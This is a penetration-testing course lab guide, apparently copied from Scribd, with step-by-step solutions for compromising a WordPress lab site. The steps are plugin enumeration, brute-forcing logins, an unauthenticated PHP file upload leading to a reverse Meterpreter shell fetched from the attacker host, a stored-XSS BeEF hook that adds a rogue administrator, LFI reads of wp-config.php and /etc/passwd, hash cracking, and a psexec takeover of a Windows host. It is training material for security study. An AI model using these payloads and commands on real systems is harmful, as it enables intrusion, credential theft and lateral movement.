0% found this document useful (0 votes)
219 views38 pages

© 2019 Caendra, Inc. - Hera For Waptv3 - Exploiting Wordpress

This document discusses exploiting vulnerabilities in a WordPress site. It describes tools and techniques for enumerating plugins, users and other details. It then covers gaining unauthorized access by brute forcing logins, exploiting vulnerabilities in plugins like stored XSS and LFI, and escalating privileges.

Uploaded by

Saw Gyi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
219 views38 pages

© 2019 Caendra, Inc. - Hera For Waptv3 - Exploiting Wordpress

This document discusses exploiting vulnerabilities in a WordPress site. It describes tools and techniques for enumerating plugins, users and other details. It then covers gaining unauthorized access by brute forcing logins, exploiting vulnerabilities in plugins like stored XSS and LFI, and escalating privileges.

Uploaded by

Saw Gyi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 38

Exploiting WordPress

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 1


In these Content Management System exploitation labs, the student can practice attacks techniques to
discover and exploit the web vulnerabilities studied in the CMS Exploitation section of the Web
Application Penetration Testing course.

IMPORTANT:
Once you are connected to the VPN, you have to configure your hosts file to contain the
following entry:

Linux: /etc/hosts
172.16.37.11 fooblog.site

Windows: C:\windows\system32\drivers\etc\hosts
172.16.37.11 fooblog.site

You are now ready to open http://fooblog.site and access the lab!

The best tool is your brain. Then you may need some of:

 Web Browser
 Burp Suite
 WPForce
 BeEF
 Wpscan
 Custom/common web shells
 A web server running on your attacker machine

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 2


“Coffee Beans Wholesale” has recently rolled out a WordPress Site for communicating with their
customers, and our task is to conduct an assessment of the application, underlying operating system and
technology.

Conduct enumeration on the WordPress and discover its users, plugins, and other information that
might be useful during the engagement using manual and automated methods. Utilize the tools covered
in the course to accomplish this task.

- The methodology to follow in order to properly enumerate a WordPress site.


- Manual identification of plugins.
- Enumerating WordPress Users.
- Identifying vulnerabilities.

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 3


We’ve conducted our initial enumeration tasks, and are moving into an active phase of testing the
application. This phase entails using usernames gathered to attempt to access the WordPress
administrative interface.

Gain access to the application through the use of brute force dictionary-based attacks.

Automated bruteforce attack of the WordPress admin interface using WPForce.

Using vulnerabilities identified through the information gathering phase, we leverage a vulnerability in
the Image Gallery Plugin to obtain a shell on the web server.

Obtain a meterpreter shell on the target system using a vulnerability identified in the “Image Gallery
with Slideshow” plugin discovered during the enumeration phase.

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 4


How to leverage an arbitrary file upload vulnerability to obtain a shell on the web server hosting the
WordPress application.

In this scenario, we’ve identified that one of the plugins contains a Stored Cross-Site Scripting
vulnerability. This scenario also contains a WordPress administrator which is logging into the WordPress
site from a Windows machine and checking the vulnerable web page. We leverage This vulnerability to
obtain access to the administrators browser, and furthermore, use this vulnerability to add an
administrative user to the WordPress installation.

Exploit the stored XSS vulnerability within the “Broken Link Manager” plugin, obtain access to an
admin’s web browser on a second machine, and add an administrative user to the WordPress
installation using javascript exploit code.

- How to exploit a stored XSS vulnerability to compromise a WordPress site through a vulnerable
plugin.
- Use that exploit to add an admin user to the WordPress installation, using WPForce utilities.

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 5


In this challenge, we identify a “Local File Include” or “LFI” vulnerability in a vulnerable plugin which
allows us to read files from the web server.

Identify and exploit the LFI vulnerability in the affected plugin and use vulnerability to obtain credentials
to the database on the WordPress machine. Additionally, use information from the database to access a
second machine on the network, conduct information gathering, and get access to yet a third machine,
using the Windows 7 machine as a pivot.

- How to exploit a LFI vulnerability in an affected plugin.


- Use that exploit to read sensitive files from the web server.
- Obtain database credentials.
- Obtain shell access to the web server by leveraging the LFI vulnerability.

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 6


SOLUTIONS
Please go ahead, only if you are really stuck or if you have
completed the labs.

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 7


Using well known tools and manual methods, we’ll enumerate WordPress looking for vulnerable
plugins, users of the application, login pages, and other information we’ll be able to leverage for
exploitation.

Our initial task should be to browse to application. Using your browser, navigate to http://fooblog.site.

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 8


Browsing the application manually, can sometimes reveal clues about its development, either through
blog posts directed to developers, or other team members and can also reveal additional users which
we may not be able to enumerate via tools or other manual methods. In this scenario, the blog is a
standard configuration, and not much information will be gathered through passive inspection.

With WPScan (version 2.9.4), we can start to enumerate the various components of WordPress. Using
the following commands, we can start this process against our target system:

# ruby wpscan.rb -u http://fooblog.site

WPScan immediately identified the target WordPress version, a user account (admin), in addition to a
number of potential vulnerabilities in WordPress Core, and furthermore, has also identified
vulnerabilities in plugins via what is known as its passive detection mechanism.

Version Detection (4.7) and User (admin) detected:

3 Plugins detected via passive detection:

1. Contact-form-manager (Version uncertain)


2. GigPress (v2.3.10)
3. Image-gallery-with-slideshow (v1.5)

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 9


In the above list, we can see that WPScan was unable to determine the exact version of the “Contact-
form-manager” plugin. We can try to browse to the plugins folder, and search for a “readme.txt” file
which might help us determine the exact version for this plugin. Upon browsing to the standard plugins
directory location, we find directory listing is enabled on this instance, and we also can obtain an exact
version for the plugin via its “readme.txt” file, and the “Stable tag”:

Our second task, using WPScan is to do a more “active” detection of plugins. We’ll pass the “--
enumerate” parameter and the “p” value to attempt to enumerate more plugins:

# ruby wpscan.rb -u http://fooblog.site --enumerate p

The active scan, this time returns “7” plugins. Some of which were previously missed through our initial
WPScan scan.

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 10


We now have a total of seven plugins detected:

1. Akismet (v4.0.3)
2. All-in-one-seo-pack (v2.5)
3. All-in-one-wp-migration (v6.68)
4. Simple-tags (v2.4.7)
5. Contact-form-manager (v1.4.1)
6. GigPress (v2.3.10)
7. Image-gallery-with-slideshow (v1.5)

Lastly, we’ll check the plugins directory again for any the tool may have missed, and we identify two
more, “broken-link-manager” and “multi-plugin-installer” that the tool initially missed, for a total of 9
plugins.

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 11


Total plugin count (9):

1. Akismet (v4.0.3)
2. All-in-one-seo-pack (v2.5)
3. All-in-one-wp-migration (v6.68)
4. Simple-tags (v2.4.7)
5. Contact-form-manager (v1.4.1)
6. GigPress (v2.3.10)
7. Image-gallery-with-slideshow (v1.5)
8. Broken-link-manager (v0.5.5)
9. Multi Plugin Installer (v1.1.0)

This gives us a great starting point in regard to determining potential exploitation vectors.

Of course, in addition to the plugins, we’ve also determined that the WordPress installation is running a
very outdated version (4.7), and quite possibly will lead to our initial compromise of the application. For
now, we’ll continue our information gathering phase.

Next, we determine users. We use WPScan once again, with the “--enumerate” parameter, but this time
with the “u” value:

# ruby wpscan.rb -u http://fooblog.site --enumerate u

Our user enumeration scan has determined 6 users, one of which is a “known” admin account.

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 12


Once we’ve enumerated plugins, users, and vulnerabilities in both the core and plugins, we can move
onto the exploitation phase.

Having discovered several usernames from our information gathering phase, we’ll use those to conduct
a brute force dictionary attack against the Administrative page of WordPress. The admin interface, as
we’ve learned can be usually found by browsing to the /wp-admin/ directory on a target WordPress
server, as we can see, in our case, the admin page is at the following URL:

Once we’ve identified the administrator login page, we can start our brute force attack. We’ll use a tool
known as “WPForce” for this, and which we also covered in the course material.

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 13


First, we’ll create a list of users, we’ll call “users.txt” to include all of the usernames identifed from the
our enumeration:

admin
ann
lane
patrick
stephen
frances

Next, we’ll use the WPForce script to run our attack, and we’ll choose the “rockyou.txt” wordlist which
can be found in the /usr/share/wordlists/ directory on Kali Linux. Keep in mind, that running a dictionary
attack using a large list like rockyou.txt can take a while especially considering the number of usernames
you might have discovered. It may be more time efficient to select a single user from the list, or try the
attack against just a couple of users at first. For this scenario, we’ve chosen to execute our bruteforce
attack against the “stephen” user.

We can use a command like the following to launch our brute force dictionary attack:

# python wpforce.py -i users.txt -w /usr/share/wordlists/rockyou.txt -


u "http://fooblog.site"

After several minutes, WPForce has found the password for the “stephen” account and has also
confirmed that “stephen” is also an admin of the WordPress site.

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 14


We can confirm this access by logging into the site, and seeing we have full control over all aspects of
WordPress.

There are several paths we can take once we have administrative control over a WordPress site, ranging
from uploading a shell for access to the webserver, using the server as a pivot to other machines on the
internal network, etc. We’ll cover those as we move onto exploiting other vulnerabilities in the
application.

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 15


One of the plugins we discovered through enumeration, “Image Gallery with Slideshow”, contains an
Arbitrary File Upload vulnerability or “Unrestricted File Upload” vulnerability. This vulnerability allows
for unauthenticated users to upload PHP files to an affected web server, usually resulting in full control
of the web server. This is an excellent find, as we don’t even need an account on the WordPress install.

From our initial enumeration results, and after conducting research on the identified plugins and their
versions, we find that the Image Gallery plugin is a version which contains this vulnerability, version 1.5.

Research regarding this vulnerability can be found at the following link:

https://www.exploit-db.com/exploits/17761/

The affected URL on our WordPress installation can be found at the following:

http://www.fooblog.site/wp-content/plugins/image-gallery-with-slideshow/upload-file.php

We can easily exploit this issue for command execution on affected server by first creating a simple
proof-of-concept PHP script that will execute a command on the server. In this case, our file will contain
a “system()” php function, which we’ll use to call the “id” command on the webserver. We’ll call our file
“command.php” and should have the following contents:

<?php system('id'); ?>

Once our command.php file is created, we can see with PoC provided in the initial exploit finding, that
we can use a simple curl command to upload our file to the server:

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 16


With our “command.php” file in place on our local attacker machine, we can issue the following curl
command to upload our PHP script to the server:

# curl -F "[email protected]" http://www.fooblog.site/wp-


content/plugins/image-gallery-with-slideshow/upload-file.php

The “-F” parameter in curl will send the appropriate “form” data (our command.php script in this case)
to the exposed “upload-file.php” script’s “uploadfile” parameter, which will result in our file being
uploaded to the machine.

Once we’ve run our command, our script can be found in the plugins’ “/wp-content/plugins/image-
gallery-with-slideshow/uploads/original” directory, as seen below.

Simply browsing to our script, confirms we have achieved some level of command execution on the web
server, by the output of the linux “id” command:

But why stop there? Let’s use this vulnerability to obtain a reverse shell back to our attacker system as
the web server user “daemon”.

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 17


Since we have command execution ability on the server, we can use metasploits’ “web_delivery”
module to give us a meterpreter session. This will give us the most flexibility in regard to post-
exploitation, and potentially using the system as a pivot to the internal network.

The “web_delivery” module can be loaded in Metasploit with the following command:

msf > use exploit/multi/script/web_delivery

Once loaded, we can view its options. We’ll need to define our “SRVHOST” value to be that of our tester
machine IP address.

msf exploit(multi/script/web_delivery) > set SRVHOST 172.16.37.5

The web_delivery module also contains several different “targets” we can use. We view the “targets” by
using the “show targets” command:

We’ll select the “PHP” target, option “1”.

msf exploit(multi/script/web_delivery) > set TARGET 1

Next, we’ll set our payload to the “php/meterpreter/reverse_tcp” payload, and set our LHOST to be that
of our attacker system.

msf exploit(multi/script/web_delivery) > set payload


php/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set LHOST 172.16.37.5

Running the “exploit” command, provides us with a “php” command we can run on the server.

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 18


For this case, we’ll add that string to our “command.php” file we created earlier (but with a minor
modification).

Since we’re uploading the command in a PHP script and not running it directly on the target, we can
remove the “php -d allow_url_fopen=true -r” section, and simply create a script like the following:

<?php
eval(file_get_contents('http://172.16.37.5:8080/rxuLIi'));
?>

We then re-upload the file to the target system via the Image Gallery plugin exploit.

# curl -F "[email protected]" http://www.fooblog.site/wp-


content/plugins/image-gallery-with-slideshow/upload-file.php

Our new shell will appear in the plugins’ uploads folder, as previously:

Clicking on our new shell, should trigger our php payload and give us a meterpreter session back on our
attacker system:

msf exploit(multi/script/web_delivery) >


[*] 172.16.37.11 web_delivery - Delivering Payload
[*] Sending stage (37775 bytes) to 172.16.37.11
[*] Meterpreter session 1 opened (172.16.37.5:4444 -> 172.16.37.11:40662) at 2018-07-
02 08:49:49 -0400

And we now have a meterpreter session on the web server.

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 19


We can then proceed to interact with our target and conduct post-exploitation information gathering of
the system.

msf exploit(multi/script/web_delivery) > sessions 1


[*] Starting interaction with 1...
meterpreter > shell
Process 24401 created.
Channel 0 created.
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

We can do some initial recon on our machine, and try and identify other hosts. First, we can run the
“ifconfig” command from the shell, and confirm our machine has a second interface with IP address
10.16.37.12.

Armed with this information, we can run the “arp -a” command to quickly identify other hosts on the
network:

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 20


arp -a
? (172.16.37.8) at 12:4d:a5:da:f6:8e [ether] on ens32
? (172.16.37.9) at c2:11:1b:0f:19:82 [ether] on ens32
? (172.16.37.5) at 8e:b4:8e:55:77:eb [ether] on ens32
? (172.16.37.1) at 00:50:56:91:ff:fb [ether] on ens32
? (172.16.37.7) at 4e:d7:04:fc:b5:0f [ether] on ens32
? (172.16.37.6) at e6:d1:01:bf:8c:5d [ether] on ens32
? (10.16.37.113) at <incomplete> on ens34
? (10.16.37.13) at 00:50:56:91:92:24 [ether] on ens34

We can see two additional IP addresses associated with the “ens34” network interface of the web
server, which appears to the internal network interface. This confirms a couple of other systems we
should make note of for later exploitation.

It should be noted, that due to its very nature, the “php” meterpreter payload is rather limited in
functionality, however, we can still use the meterpreter prompt to gather information about the system,
and we can still utilize some of metasploit’s “post” module to gather information. For instance, getting a
processing listing with the “ps” command from within the meterpreter shell:

meterpreter > ps
Process List
============
PID Name User Path
--- ---- ---- ----
1 /sbin/init root /sbin/init
2 [kthreadd] root [kthreadd]
3 [ksoftirqd/0] root [ksoftirqd/0]
5 [kworker/0:0H] root [kworker/0:0H]
6 [kworker/u2:0] root [kworker/u2:0]
7 [rcu_sched] root [rcu_sched]

We can also utilize post modules for gathering information, the “post/linux/gather/enum_configs”
module for instance, will gather all config files for later perusal.

In this scenario, we are tasked with exploiting a Stored Cross-Site scripting vulnerability in the “Broken
Links Manager” plugin, with the known assumption that an administrative user is logging onto the
WordPress site and checking the affected plugin’s admin pages. This should allow you to get a BeEF
hook on the administrator’s browser and should also allow us to use known tools or code to create an
arbitrary administrator user of the WordPress site.

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 21


In our information gathering and enumeration phase of determining installed plugins, we should have
identified a vulnerable version of the “Broken Link Manager” plugin. This plugin is designed to redirect
non-existing pages to a 404 that can be customized by the administrator. All broken links, are also
reported to an administrator, as can be seen in the following image showing the admin “LOG” area of
the Broken Links Manager plugin:

In the above screenshot, we can see that requests for non-existent URL’s are saved in the plugin’s “LOG”
page, along with the Referer, and the visiting browsers User-Agent, which is also saved.

Referring to the research regarding the affected version of the Broken Link Manager plugin (v0.5.5),
shows that an unauthenticated attacker can exploit (modify) either the Referer or User-Agent header
fields and replace them with arbitrary javascript, which will then be executed in the browser context of
an administrator viewing the affected page.

This vulnerability occurs due to a lack filtering of user-supplied input (in this case, a user-agent or
referer) header.

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 22


For this example, we’ll use Burp Suite to launch this attack, however, the same thing can be
accomplished using a command line tool such as “Curl”. We’ll also utilize the BeEF Browser Exploitation
Framework. BeEF will help us get control of the administrator’s web browser.

First, we can launch BeEF from kali linux with the following command:

# beef-xss
[*] Please wait for the BeEF service to start.
[*] You might need to refresh your browser once it opens.
[*] Web UI: http://127.0.0.1:3000/ui/panel
[*] Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>

● beef-xss.service - LSB: BeEF


[*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1...

This will start up the BeEF panel and prepare the hook:

<script src="http://<tester_ip>:3000/hook.js"></script>

We’ll then use Burp Suite to modify our User-Agent header while requesting a non-existent URL. Our
initial request will be for http://fooblog.site/nonexistent.

We can then send the request to the “Repeater” function, where we’ll modify our User-Agent header to
be that of the BeEF hook:

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 23


Once we send the request with the “Go” button, let’s simulate an admin to see how the attack works
from both sides.

To simulate the admin, open a new terminal and execute the below.

# rdesktop 172.16.37.15

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 24


The remote desktop credentials of the admin we are simulating are stephen/Stephen78

You will be presented with the below login prompt. Click Log In.

Then, you will be automatically redirected to the Broken Link Manager’s logs.

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 25


By looking at the Broken Links Manager’s logs, you should see a “blank” field as follows.

If you don’t see something similar to the above, go back to Repeater and issue the request again.
Then, quickly go back to the Broken Links Manager’s logs and refresh the page. Do so, until you see a
“blank” field similar to the one depicted above.

BeEF’s UI should also contain the admin’s hooked browser, once you see that “blank” entry.

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 26


We notice while we execute this attack, that the hook doesn’t remain active for long and we lose our
connection to the admin’s browser. To mitigate this, we send another BeEF hook request as we did
earlier, but we quickly use BeEF’s “Create Pop Under” module in order to keep the hook alive.

The “Create Pop Under” module can be found under the “Persistence” module tree.

Using this module will give us a bit more persistence during the admin’s session, and should appear as a
second hook in the BeEF interface:

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 27


Our second objective for this task was to use javascript to add a rogue administrator account wordpress,
using the same Stored Cross-Site Scripting Vulnerability in the Broken Links Manager plugin. For this,
we’ll use javascript that comes with the “WPForce” tool, and once the WPForce is downloaded, the
script can be found called “add_admin.js”.

Viewing the add_admin.js script, we ll need to modify several variables, the “url”, “login”, “pass” and
“email” variables as can be seen in the “add_admin.js” code below:

Once our script has been modified, from our attacker machine, we’ll serve it to the target via the XSS
vulnerability, and we can do so by launching a python SimpleHTTPServer on our attacker machine, in
this case, we’ll set it up on port 9999:

# python -m SimpleHTTPServer 9999

Once our web server is up and our add_admin.js script is in our webserver working directory, we can fire
another modified GET request to the target machine, but pointing to our add_admin.js script on our
attacker machine:

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 28


Back to the simulated admin’s computer, we should see yet another “blank” field as follows.

An admin user “hacker” must have now been added to the WordPress site.

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 29


We can now login, with our new user account.

And have full control over the WordPress site at this point:

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 30


In this challenge, we’re tasked with identifying a vulnerability within the “Multi Pugin Installer” plugin,
exploiting it, and obtaining access to the underlying WordPress database through the vulnerability.
Using the database access, we identify another user for another machine on the network. We use those
credentials to execute commands on the second machine, allowing us to use it as a pivot to attack yet a
third host.

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 31


If we think back on our enumeration of plugins, we should have identified that the “Multi Plugin
Installer” is vulnerable to a Local File Inclusion vulnerability by an unauthenticated WordPress user, and
this should allow us to read arbitrary files from the machine WordPress is installed on.

Let’s have a quick look at the problem.

First, our research points us to the following post about this particular plugin:

http://cinu.pl/research/wp-plugins/mail_2461e0b03bcce05cd091af609ce568b9.html

The above link states that the “mpi_download.php” file, part of the plugin’s functionality, is the source
of this vulnerability, so let’s have a look at some code:

In the above snippet of the “mpi_download.php” file, we can see that the “mpi_download_file()”
function does not contain any code that would sanitize or restrict the “file_path” variable from
accessing files on an arbitrary path. This means that we can submit a request like the following to access
the “wp-config.php” file, which contains information about the WordPress database on the target:

http://fooblog.site/wp-content/plugins/multi-plugin-
installer/mpi_download.php?filepath=../../../&filename=wp-config.php

In doing so, we are prompted to download the “wp-config.php” file:

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 32


Reviewing the file, reveals the username and password the WordPress database:

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 33


We can also use this vulnerability to conduct enumeration of the target, but download any files that are
accessible to the WordPress server user, for instance, downloading the /etc/passwd file:

http://www.fooblog.site/wp-content/plugins/multi-plugin-
installer/mpi_download.php?filepath=../../../&filename=../../../../../../etc/passwd

Since we’ve gotten credentials to the database, we’ll use that opportunity to see if we can access it
locally from our attacker machine. We can do this using the “mysql” client, and connecting to the
database as follows:

# mysql -u bn_wordpress -p -h fooblog.site

Upon supplying our password, we’re now accessing the database:

Being familiar with how to interact with certain databases through their native clients can come in
useful. For instance, we want to examine the “bitnami_wordpress” database, and to load it, we use the
following mysql query:

MySQL [(none)]> use bitnami_wordpress;

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 34


Listing the tables within the current database, can be done with the following command:

MySQL [bitnami_wordpress]> show tables;

Furthermore, we can list all users and password hashes. We know the users live in the “wp_users”
table, so we can do that with the following command:

MySQL [bitnami_wordpress]> select * from wp_users;

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 35


Now that we have some hashes, we can use john to attempt to crack any. We can save all of hashes in a
file called “wordpress_hashes.txt”, one on each line as follows:

We can then use either hashcat or John The Ripper to attempt to crack any of the hashes, we do find,
we can successfully crack the password for “lane”, which is “ilovechris”, and we can do that using the
“rockyou.txt” wordlist:

# john wordpress_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 36


Armed with a new username and password, we can check for password reuse issues, and first check if
we can log into the windows 7 machine we identified from previous information gathering. We’ll use
metasploit’s “smb_login” module to confirm our credentials are valid.

msf> > use auxiliary/scanner/smb/smb_login

Configure our RHOSTS, SMBUser and SMBPass options, and run the module:

msf auxiliary(scanner/smb/smb_login) > set RHOSTS 172.16.37.15


RHOSTS => 172.16.37.15
msf auxiliary(scanner/smb/smb_login) > set SMBUSER lane
SMBUSER => lane
msf auxiliary(scanner/smb/smb_login) > set SMBPASS ilovechris
SMBPASS => ilovechris
msf auxiliary(scanner/smb/smb_login) > run

In doing so, we find that “lane” is an administrator of the Windows 7 machine:

Getting a shell on the machine is rather straightforward at this point, we can use the “psexec’ module,
and obtain a meterpreter shell on the Win7 host:

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 37


msf exploit(windows/smb/psexec) > run
[*] Started reverse TCP handler on 172.16.37.10:4444
[*] 172.16.37.15:445 - Connecting to the server...
[*] 172.16.37.15:445 - Authenticating to 172.16.37.15:445| as user 'lane'...
[*] 172.16.37.15:445 - Selecting PowerShell target
[*] 172.16.37.15:445 - Executing the payload...
[+] 172.16.37.15:445 - Service start timed out, OK if running a command or non-
service executable...
[*] Sending stage (179779 bytes) to 172.16.37.15
[*] Meterpreter session 2 opened (172.16.37.10:4444 -> 172.16.37.15:52517) at 2018-
07-08 16:53:26 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

At this point, we’ve gone from exploiting a LFI vulnerability as an unauthenticated user on the
WordPress install, to extracting database users and password hashes directly from the database, to re-
use of credentials for full SYSTEM access to another host within the lab.

© 2019 Caendra, Inc. | Hera for WAPTv3 | Exploiting WordPress 38

You might also like